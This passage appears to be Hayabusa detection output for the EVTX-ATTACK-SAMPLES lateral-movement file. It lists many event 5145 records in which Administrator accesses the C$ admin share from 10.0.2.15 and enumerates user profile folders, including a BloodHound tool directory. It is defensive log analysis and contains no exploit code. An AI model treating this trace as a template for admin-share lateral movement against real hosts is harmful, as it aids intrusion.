Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded 
TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Music\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Saved Games\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 